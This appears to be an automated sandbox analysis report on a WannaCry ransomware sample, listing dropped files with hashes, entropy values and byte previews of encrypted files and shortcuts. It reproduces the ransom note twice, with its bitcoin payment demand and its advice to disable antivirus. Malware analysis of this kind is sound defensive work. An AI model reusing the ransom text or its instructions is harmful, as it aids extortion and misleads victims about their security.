                                Preview:WANACRY!......f...V.e...".7`....=.1!.#^;..Y%.}.t..<..6/.....|..#.=t..t .^..'...f...o.J....r2J.30...;...\C..7m.Zr...[...R~..\..._......U..+..%zR.@.Y.....`E.OQ.;.{....]....5L.?...,!6"Zl..w.*.-....R(.9I.wt.1s.......3,Zn.X... ...!0A..e}X.U...o\;...._....1.....>....80......s... ..g<...H.`...p!..(...bX`......1(`.Nu..H.t]..N.a.{.iK9k.rh..@..d+x..z....4.........48p`.'....>.9....XKJ....[..+...p..J.."`..g...|=..'XV.2:.G.,x.|.'..tv..........$`fZ...@...m.vC.0.)....)j.yP.!?.@...D..E...Q...J........j.Pc.W.E.|..Q..*1)...k.W.Tu..'=.[..!..6../;)8Em.)..m.[=.oD.0.......-..iW.....".........7.4.......i75].Q!..Z...A.9`.....)k....I....l"..[0..l...P..#a.9).P.....18.zDyv#0...^.C......o^hg..1....V.&3.;.d{.K.=.2..?.......i2f.%B.....i8....~...H..D..%.F.X.>..`...u...;...dg.f.dc.-.-...6M,.'...M2ij.m...i$.=!.......=T..S.Za!l...?.xw.X.~.A.pG...h...T<..8...K7E..-7....M.........%.%&.u.D.C....%..T.;.i.Y.N./.....S..P.-.'....x-.+M;..\0..x.Z)..?2(..M.*9...$....6 ..h....K....

                                C:\ProgramData\Microsoft\User Account Pictures\guest.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6344
                                Entropy (8bit):7.9695539682207395
                                Encrypted:false
                                SSDEEP:192:1j8AuaAbjgwLaLvoYOeuD33lHniFSHB/qTjmwPj2MXJ/Gw2cpYFJq:1IDljgNEZFD33FniFShg19/GTYgJq
                                MD5:25FB99FF9D34423D81CEF168162EECF8
                                SHA1:E03576EFA8732BFE9AE661315F0F449418D6DB6F
                                SHA-256:CC3BA82846EF43739E01EC7FE8E44E4730770CB602808FE202976F6FE554A7EC
                                SHA-512:F1E5F806E4AFB745748E79848295798BA118484C2A778DD8096FCEB4CB6C79F35E543D5EFBC134028E72B00AE6F2D84FD03895107709E097A7724213C3E867FE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......x...&S...8t.[.($)..w.#../.J....O............*.......77....C9._w$..O..!m[<h=H...J1`dx@Df`...I.n.........V..:z....*J.s.n*.\.F.n+;...0..8.....4.......3....i...n...M.@...Gm.u.`OB9P......O.{4.....>..m.<......+..6.o...g^t9.M2...U.S.Ql..hqD...'{2*5KT............m}g:JYJ<...9v...4.....6.7..)t.K...I.Y...xe......d6E.+.P._og..^.....W.J...z#Y.z...*A.U./.."O.........$S?.EE.+O.;.....J#...el....!...U...&.....(m.N../..(w.r.+Ou.{...G.....z.1!.A.+..F...nZo....S.....f.(CH~..Dm....QS....TH3..z.6....I!..~.7g1.2 n.uS.......qo.M..v.... i.k55.7..Bi..8.........%.h...V.~...0.!...W;..f....}!.....2....b....;U.....}q.W..$.,x.0.ay..rW.{3...>........X..+....l.N'^7.!#e....r."_.8..8Fu...q..\....g.b.<m.R..>..E.....r64..0.D.i.Y.|\......h...p....<. .ev..v....l.).../.Q..G...(...l,..B.../....6.J.*.......lu.....q........[.B2."s...1f..`Q3^..g.t.....n..Bu./i.>....i...bD%..=K...a2P(....v...j..J...]m.....g..y..T.,;...W...'.%k.v['..y z.pI+.....!qr^*..;....6..^....96..

                                C:\ProgramData\Microsoft\User Account Pictures\user-192.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2680
                                Entropy (8bit):7.931584328626483
                                Encrypted:false
                                SSDEEP:48:bkvb5V1R8x+z/y5Lm69RanEReO4BEQAuwtK1+hN59mrmhPmLi8ntYdOWAL:oz712oTy5HGUtOEEQK1+/5QChcltYdOV
                                MD5:0D247F0356B0420C5DFAF27F0D9AA456
                                SHA1:60B14962C61CF5AC6CD436CF686F6BA303317C51
                                SHA-256:40446AEABF43FCB792CF0DA5A1C9430A7453CBD47AB61A3DE74D2B73177CDE9F
                                SHA-512:C41A78EDB3296D0E550EE6A595E89C9F97D5C5B3E705EA850C9C83E49534C2E2E9003D84F06E188D337D883E53888F385D6949BD6F20D73A24BC28B246FF72AE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....3.M...z.e.....1..^....Y*.`.._......F......]..$#F....djK7.i..BYP.=..D....8Td0......2...t...1".-u..$..)m..AM......J...xv&..H...)vl@v..a.......[..P..I..y.Z..W..($.u.........[....Cd...@|..2.V#..3U.p.2....g.`#.0.c(..5..S...0...K..+.5.gL.-....4|....u.8....X.......\.M...z....|,R...,.$.h... .. ...h..D.Cq-....Zx.T&....w.........O.#p.'M.<0d^....T.r.l.i.I..|.~.Y41..l.. .;W..{.>.....'N.<....1v....J...FX.k.vG...Yv^K...%..........xLV."}.J\s.D....O3..~..F.6L..[.R..$....G.fV.H........Y...A...cp%>..s..6G:........>......:*......J.,-.&-.....G...J.[uI......s..xN.o...H.V..x........}....H.H..m..;..#..VD....^5.,........!.*..ew...C.}.V...z .....i...(...I.....~..y%i+. ......7}.)7v...p:YN.....1R..&..Z>.....EfV7.W\..(......q..........OV.:p.i...R......\..[..%...9[q.'.&.....!Ccb...u..MZ<.......8..... .\..C....T#..B.....|.....u.z&<~.?..pt.e..,b..k6,.g..>l.~w........[.-w.<.(.....?.}.....P.K....r.p..UfC..T...+...x.p...sAz..Q...y....U.g=.p.cx.........|......1

                                C:\ProgramData\Microsoft\User Account Pictures\user-32.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):728
                                Entropy (8bit):7.67356349573684
                                Encrypted:false
                                SSDEEP:12:bkEQIcBXO2camedIh6JznyEtzNMdjLEYkYl0HZ2dUK8MOz8ZwVwUlT+tntOBLrWV:bkPXOrajdIIJadjL/kw0AdrOjV1N9ZCx
                                MD5:8E93F870633F8F5B7875AC1BEFA3A1C5
                                SHA1:75B66176BADAE114D51744639D85BDE284CBC719
                                SHA-256:368147C008979EC414305C539A66F001A2D031E703644E77FF3DDCF56960192F
                                SHA-512:ED9D05B7E1AF5BCC354C4A3CE955CDC12C7092E683A0803B2B0435BB24A4CADBAB3C2F504636472809981C9C7B2044364CB3B4244529B85C652710E7087EE8AD
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....L..]..T*.O.=b..%rN.2. ~hJO...1.l....g.:..V.....ck.N.E...).W.$..v..0u.k.T4^(Y...w.....D..0..i............z...'..Y%..x.b.u....p..C.._.`.L..o...n..?...20.]2.:.4+7..r.7..;....(\.u.......<.W..>.Se...H._o.m\G/...;.w.C.=.R;....NQX.Gx.!H..$...f9.<.dS.6..8............R..Z>4Y...7.Nblt.#...~......%|?-..p."v.A..}62.......6...5...wx3..m..-.@w.5.HA.XX.._.....|..+.`.......E...cH.z.q_..?b.'sU.y..J@.pxQ_5....F.!...d^....oz.U..B.....r..'.P.+........M.'Pc.&...g.n+k._99zD..01J.......&{ ...Z..{..s..!N..d..T..`..|..cY.v..#.....W#.........~..Ed....+.4t.9..:+.oD{......i.~3oY.-r..;...!...S.$e...^....wc..Q.....^...`._}.&v.:._c%y....&8......R..g3.#..i.9 .w2....G.Y.......w.#..#.."..a.A. z{...N..h5.B.k6....C...

                                C:\ProgramData\Microsoft\User Account Pictures\user-40.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):808
                                Entropy (8bit):7.731787316287654
                                Encrypted:false
                                SSDEEP:24:bkzXroPK2pdYLC73jERZa4my1PIwgfKiOqy9gDJElZEw:bknoPwC7TERM4FCbptS8JEt
                                MD5:171983799A5592EB0872ADE58107ABA4
                                SHA1:60BD3CE3BCFFE09AEF136B339C6C517E00EAE386
                                SHA-256:7EF6FBE8B22ADA15D7FC087A258EA9646A2E35735C7A3F0B100FA880498B61C9
                                SHA-512:4F316AFE9ADFA46B9ADF2BCE4A286C05DCA2B0688546745C71FCA6592441E9EC71998BD1B586B2874468560584CF7F58C4CA2C3C83E5018E1D5AD60D9A0797D9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....U...h.......m....;.W.5O.ef..].:...S..-..tC8...W..=n...m\?...~|Z/......7..K....dyb.a-.L.r..qJ.w:>!..z>......!I..y....KA`j[......Q.....1..~....."R8.."..V...(.G....*.../8...R...8.p.c.&......V....2...5.&......G.R.].....6.../qf..sWE.j.".Ue.`.I...<............vj.....?...a/.<\,w...[.fC..+8..e(.c..j..W(.ZqcR._......). zh..W.y..b.L....p.IB$.>.(..p...h..w.a4.Y..5.....Q......&L.@.y.`.n......%.M.TcW....@.`.+7..8@.G.G!"N..l`.....P.....7!.'..mPy.[j...;....n..<.>..-.&.L.#p.22.z..S.K.[I.;.b..$. .T0.>z+..&l..M........E...y._.$......0...._`#..s.m.R..hM.2'......3....S;..9....qs*..u.....s.x.}...<.j.g.>7....U.p....z.YXD......Mf.V..d..X1/)=....Wp../......Gc..T.)q.U..^.r....UM.e.._)..yd-~4...(.=....mB.... vk..M......c...i..Z.R.]g..x....c.v..+e..dk..YJ..2..}.+....M-.

                                C:\ProgramData\Microsoft\User Account Pictures\user-48.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):904
                                Entropy (8bit):7.750375763100044
                                Encrypted:false
                                SSDEEP:24:bklXaS+HKMUgnNfHgE6gOPuu4wQF7iHE9aNfZF:bkNaHqTcfHgE6gTieaNf7
                                MD5:B461993C7F6E132473416B8159575650
                                SHA1:9819CECCA62E70CA81801DF5C81EA0E7C3BC2FE1
                                SHA-256:59E94A391054D256E7E1D41B5BEB757B2BC04ED81CC4F0F128470B65A1FF74F4
                                SHA-512:F431E0F47959FC8307507101A2B90A34FA8744639C1D0D555F5D30ADBCADBCA493A37A4F19CBB10D631AD9E25EC9F2566DA8A8926EB2A34634C28796650DA1C5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}..[....E.X....S..y..r.......^F....a.zT.%.[<@.#swD..{acTH..3.....A.l.'..H.p7.b..|`G._..:d@]V....n/Fs...8........r.[:vfG....S..VB\.(.....s....p..F.........E. j...Q2.e.R.5(..v...}6.......&v....zpB...0.U?.....~y.:\F..F.J..I..]&H........B*.I.!.2.. ....i........I....Q..h04..e.o.2....D.,..7Kr...~..~M....L.PG.ct=|.X."...Y......=..ka"mV..})v.....Bz<.._.V.n....x>.!.\u..,..\CS65...D.rCa.O.D..i#E....a.ed%E.CA.w....&.}Q(......G.9.ogq..K<..47m.FJ...J".F4a.....w!.y..3...H.4.>Lf........|.2.r.C......{.0.\....%...oX]`>@./...\..`].7....{.p).(A....... ..w........Rt.k.v..h...1...}:. .?.....`*..I"2.......,..G.o......3$ar.....9..]qVr."Sw.D............X.`...5d#a.S....OS...)..S.k...G.o.....9.r..C.\.-..^......B...]^.q.O..4Gr+....+.Df.....[.MB.I.0;.....G.Y.D.E..l...z.W..U.u..Bw2.....X.>..:V......O...>$.0..c....1p...uqJ._.X.dP4.j.4.........BO.+.Mw.o)!....=...

                                C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):602456
                                Entropy (8bit):7.99967222940526
                                Encrypted:true
                                SSDEEP:12288:yd0F8sxhZFZkUFbR81WLVzWSnk+RVRa+lMiOI6WASUJUXknkII:ysNGWJCPQVlEyRZII
                                MD5:F4DB6F83F6D703F4DFDF32448A0D4875
                                SHA1:0F58B53D7AF3E959EFE2166211ABA211D13D2274
                                SHA-256:CEDBCB1AEDDD0B962E96F43F7E44E9F2398A8B0C046717D21A95ABBE0163209F
                                SHA-512:68E325CFD2FD03C45B460F2497EED3EDFBA84EC2D7D4BE5E95A2DDE6CAF9C36F7378748A9BA294AD5B8AA3CE4A3A0A5ADD4D9BFCC044495D46E70344E8B90CC8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........2..D.n..E.P......{4.^...R.i&.Y..[.W...~..!.C.jO=.*O..j..2_..+..?..".b.%e.H..e....I..Z..#..AE.m;Cn5..$..1..."7..]G.....M...lI`V.t...Z......8Ls....H.....u..RN...a.k......G...>k.@..7...SS.....\..^c...u...h. ...TUGV.+...<.s2...8.....)-B...(.....80......B.U.J.R.....vp.C...z#IH.....Q. ..f% .G....Q..4..{.....z....b.............`W4xz.<..8U%...oQ..3U=r..S....R.....'f...$.e..".1.........1...=...A..K..*...0@/....)."..VZ..#..<<.m7..:.N...zL.9.%M.....l......m.[t`Y..(j@t..q.\Z.. .F.....C...7.}.JF.......|v{1.&.u....C..:....6.........t...GUX...z..%.y."8..v+/.....s.....>Z...C.<....Gi.l..L.....t.Z...>..........P...^-#.._\[.ar.j.b.K.tjq....|f.+O..H..M.T...<..P.B....D.B............9Qi.P=..Z.v.&x..#.....F........|B_.`i.t.2...!.m<.g~Nh%y7.d.o.f)..I&N..../.....".l...C...0..'8...aW.....- ...&..M........:.D-...V..S.oA..".....M2..h&k.,......g...2.....1.!...0...|.IM...G.....E.....L.3..7.!7..C.P7.sf..........b...8...8.NZ..m1.in.W..:<y..N.`.Ly.w.O

                                C:\ProgramData\Microsoft\User Account Pictures\user.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6344
                                Entropy (8bit):7.9754787145896495
                                Encrypted:false
                                SSDEEP:96:oBt4zOH2CL1EGINmfNInDBlKj1LE7R1Kzf1Mk39y007t9ZtQV8hQPxTSw1QfZLPx:hCL+GINE2DKVE11O9MkvggLQBRpIs9LP
                                MD5:D532598266C6F62D28A9BDBD7F69B475
                                SHA1:913FC21F1652570EDBA0D1D2FA4D3D74521A3A56
                                SHA-256:A5D97B7F8ACDEE1EECD64040C88A74FED7183FAC8277F7672C2E676BDE8F4DA5
                                SHA-512:679558496286040DB43C15B6DCCC3032D58A5674072948DB2F02E776B626E73250A9226A1D3F5E1310933180956765F191C8A0AC6EF72D399848DBD4BA6B2455
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}f..pS.;....)....v.%V.%.N}](.A.n.!.......l...C.PLh.....$.......P..f.6...B..^...Z..n.K`?...@b.X....|S}....q..y..K...c..J..u.S...t...~......%fR...z>E.b.g.A....#..$.KHe.._&....t..I5.S..;..u..y..*:.}:I.br.q...y>.....`....U...th...\.3..|...y..c8..&Uq............. ...[..)F.W&..*..b^..:@] .Y.u..:llM.../...6...'K.-....K[.M..=...<WW......,.F.....w..I.tv;.(5..t...V.O..lq..Z.I..M.z.......W.7_...^.R..n.N....mO...%.p..@..T..*..V...s..8.36.C......z}....Y:..5...p....z...-g.]..k|[.GZ...Z.hxsS..q...8%.m....tl....<.r.....j.+'...)...C.....%8$...m.kF...1.#1..Y.M.K..p...^.. ....P......L4.......(=.\Vh.....2t.+..1s[......f.0.;.{==t....^.^.]..U...A..}.{C.h......ff.0.0E..3...2w.\#vkf.S/..T...5.2.5v..."XN..uW.n..'y..].J.Uu.q..y.Q.9.......F.....L.:..,.x..V.M.T7.7.E ..`...P[...k...\.(g)81..a...-...K...!...9..v~..R...J._!.W..... A./".D40*....-8....:zd...?.....s.><l_ytV2\.u .gt...H/.O.?..P.8...._....3J.4.d...N...n.*.Dx. J..F.E^....M...T9|J..#..|..p

                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.9724099953514305
                                Encrypted:false
                                SSDEEP:192:tuvAiXVvcSQ6vej+Q4CljqiBUOO7QdNZ2oI:tuvAiXVESf2i2l/BUpcdNZ2oI
                                MD5:066854BE7A95C603A3F56322FAB5AF0D
                                SHA1:017316CA5BBF291D071189A8B080C570EE4DDC91
                                SHA-256:CF02663C8B29425AAD79E34630DFE32429CF1517F13A5CA6FB23A9DFF8D9145B
                                SHA-512:A2B58B673FD1F76D85ADFA81A1EE49F4A263E3B3416EF0A55F0EA9E817E2A2E6A2FA180906575862FB430C2D895E19EF5D35F9977C30AD3C0642CF240855724C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Iz....f.}.hpt=."..L..F....s...s{C.9tV.]...g.!.....|..%7........`.)[6.6.m>U.i!.'.L...x.....PY....c..Dqpp.F...A.@F.z.).3.C..m.wv..........ui.3..%.Y.;8....wO0<...h%P.jJ..rId....J..,PV..........>...~..)..H.c...o...TG}Wk: .....rZ.}2!;.1/H......A....9....=.......\|...t............>....:.u. ..R`'A....(|....!/.....V..r.b..4....T.>8.N.y..N...,.E...Y.\.!..Fo..*..t#...>.x.i...U....k..N.3...[1j...l..p..kAo.T..._A6..p..8`RlfSGb..XL..Bow...M..U.S8Zk_..G.2..WM.smD....3.f....3..,2.L.,...C.I.......A...........Ao..+.`e...r...LL........Y..{.E".Z...N.k..2j!...\.....!.gZ..?u............Z....F.s2.M5.>E....l...7..(.O.K.pO!.....9x..$..<C..K..k".g.<7.7@.8S..<..4.....I.n.(.t .D-4,YK9=J..y|.....Vh...^.o.dMKM..|.J....,..Vh].b...0..;b..>d..p\...{..l...h"....zp.0S.$........'....R..U.K..i...a....V.J..o..$9.z=.EZ.~......`?..z..5.d.Qx[...;..h[bO.p.h.a.ovQ.S..v.]..V..........q..E...?..C9. h..$9.C=..p.h. 5.:.....6..U..&.Ed|..'..~..:6....p....4...!.....H.....

                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.970189477864432
                                Encrypted:false
                                SSDEEP:192:Yn3L+LZUXc2CHqKzt9OzwYQdXDfAQuElVUzZ8:YnmD2CHqnQ5ll
                                MD5:A8C90DBC139D2144999B27719EBF0F15
                                SHA1:629FF64D81E71F58FCEFA95CC9CE7572A2117453
                                SHA-256:E8E2E583B57B73BF55135FCB8FF0EB87A0F3C10C369EA9F58126B13CE33D0F39
                                SHA-512:346596158AE51F6DD73A09D493F4131A7C3FE2E8BAF8AC52423E004ADF56F9D9C3C287CBD6831F9714EDB3BBF18F397E0C61D288BA2A702B2597CCEEE1EEE3CA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-.y....ZA2^..]C.S....S..."}...V9.r.V.T..<..6X...a.......G.aY7.....=..$K_.$..8.3.b.N.Z......g,.!O-K..9..7!.`...7..E....c..5.m.A.j.....ZV#a..q. .....8.....B.`.Zr.....Un...$.v.a..+e.......aV.h?.h...UI....,....PV...t!.\..|$1....3.HO.^....RE..5p..........=.......}....;.P;....b.....}......W...3..*n.Tde.4W).d...|.....Q$5E..h.S.G..f8..a+Y...d.....F.;d7.4...%]..QI....1R!.._d.V.I..;.[1a...N-o.Y..!....Q..b..<.....k....f...\s1.H.....iG..o$.K...i....Y.&.Z.G...^.Q.y..+......F....`...V" P....3.... .@... 2....~...A.M...z....H........B..K|V..M.K;5:...8.T.Ry......Id....V.....]A..]R...\.X..(..a..X.v.4.......5.Vy.[.......<.<eS..T.T..Q.C...x......~........<....1..........W.v.ZO..\........b ..r....r.5...D..wc..X}. _W..q.XmDG....{.O+..BB...'-+.........H..T,j...+B$.+.2!w9(..*...?..C...u.:..H!.a..6-.#...i.....~..........&......L..i..T.,.).Km@.9.y.`qeC3.h..C.......Y~*.G..........}..G....{.X3......0#.+IB..n..W$.......U...!.L..`.:...C}.yy......{:..s

                                C:\ProgramData\Microsoft\Windows Defender\Scans\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Windows Defender\Scans\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):917784
                                Entropy (8bit):7.999775460249474
                                Encrypted:true
                                SSDEEP:12288:gwjDV6e/q5o6T5bF4wVgCj+//nKkwCoxpa0AwgdJaVHciT1/yooK49a8hM:gwPV//UR5/VS//KPxpGjan9yD6/
                                MD5:111B53273BBB9FD96E85C1DE41AE66A1
                                SHA1:D7A6C6F5AF7C45E5D343654BB5CCB2FCFD261314
                                SHA-256:02BB09FFC6F2DD083F2875F60649C879FD6F29A4B31DBEDA425D01F19462CEF5
                                SHA-512:6B06BB3FA721277A2E087B29889480FB83F11E3B564FE0A630DA1ED3B8062CCFD156340FFB3EACD0588C356CDB54D4142CE52C5F0B2CAA295257A9830065760F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....V._...&...Q..T.....z.(..{..S.O9.6..A...nd$....~.%-.3!...Qe..r.#u...C".+...A'%.-}.W..7. .......)Be:..>;........t?...X.s.,I.X....'.~....l.M.hOt....MI.Y..:.7F......s.;...F.J...-:........,.2.f....6H.0...I.r....h.K...9.y{k...^..}..."\R..3....................[T..T..}n..~.3..U.S...).../...<.......e\u..._...T`..q;.[..V.......V@...Zv.K=/.7..]....~.....t@...:.Bb...,\..k...v0.rO.......w....b..S...qki......}R.._-0. Q...i..G..n.....)G......'..5.......?.o.Zu*..]..;...?...\=w..a.{..uZ..7.P0..o+....^MJ7.eJ.."m..3.[d?. nDd..|X.R.Ev....)...\...Q. ...F.......$..2...ra...82.`Lq.....yXgHU'....]...TyR.75n....~.S.....Mg.....V2.H..&.,.U]\m......y.$.J....Z..c.J......b...;..W{)y.....Q..m....}.... ..4.?N.....^.....~...py ....J).;b....%Qj..~X1lUy.....,./4>\..~.F......;.y.i..0.....4M.xlF.,'.gh.)..j.s.%.S..~.>...^v*..j.=.....0n$C^.5RL.,..n...>.C~.....5~........R(L.`.....0.....({...p.#.yF...b.E.....,..D'4.>..:.....).....?.U....+O...N.[... ....Gy3^..!.y.$

                                C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89816
                                Entropy (8bit):7.997885471962823
                                Encrypted:true
                                SSDEEP:1536:MpaK5UiAWqmx5GyhMttzgD77tRq0CVV+GWb9V5qTuKEo:MpaKGAzhMfMBw9otL5muKEo
                                MD5:A9A958E1926E7A8314616502F7BBB54E
                                SHA1:635A86DA35F7696E57D86DBEEA70BBFB8A144ED1
                                SHA-256:46259CD7CAB3A1B4E5896DB57E7F531BD8769C560F6E14632BB3803A4A3BF16C
                                SHA-512:64CEDA6CD58B936136CD7CE646D46FB598E055E29FD917CF2B9584F3C1FF419FABEE66009CEB7E35B15C5D598079A6D0A85B7071EE88A0543E97A13E3B7DCC34
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....8p=....^..+Y....Q5......$....4n..4.C.>.\...7.,W.'..1.;.*.Y.........9EoR.UqlY...w..9A?.L{C.u(.r..D.d...b.}w.3..)8.Gg.B;..{..n`.~.p..l,.9...ts.z.i~.Q..9.$j....).........z...o0..$KT=Y.S...."R..N...cl....i........K.X...`F.g.u0.r....V4s@.IK.O.....]......g..A....G....,.8.u...(D.+k]<...8U?.n8......;~...X.y...C.i. N';.........=.5=..tv|.h.[~.x..._o...S........g....z..<>./.c.....!,0....@.5P.......`...-....;M...>x..Xe|..Sh.:b....{9....."..,....c..`.....Z-.v;jP..p~.....,oT`AS.?U..../t..E#.n..../a7.1A.uT.Y^.....,.`0e.^7..F..I\..g..sM.PST..t.J..j........b.........c.....|..2.-.....QP>...+.(..{].'..ew}....r....D|yE|..@$.J..R!.c.r{d.[...<.... .n....X........v.....&dA{.kl....D........9.P..)..i..A.MJ.h,...RDlPKn.y.b"uL......r.B.j.~.NX.V<..v.;.....(..F.a.P....'K...[.r.....t|.*...E.{..:..i.M..}....Qqw.A.+..K.B..n..Nr....E.t>.....o1.w.....#o.$.2XC......G!..<...(..S.... T\x'.JR.-..e7v.........:..x...WVG..O(B\...F.Q.M..$0,t.........L.H.........#.%..

                                C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
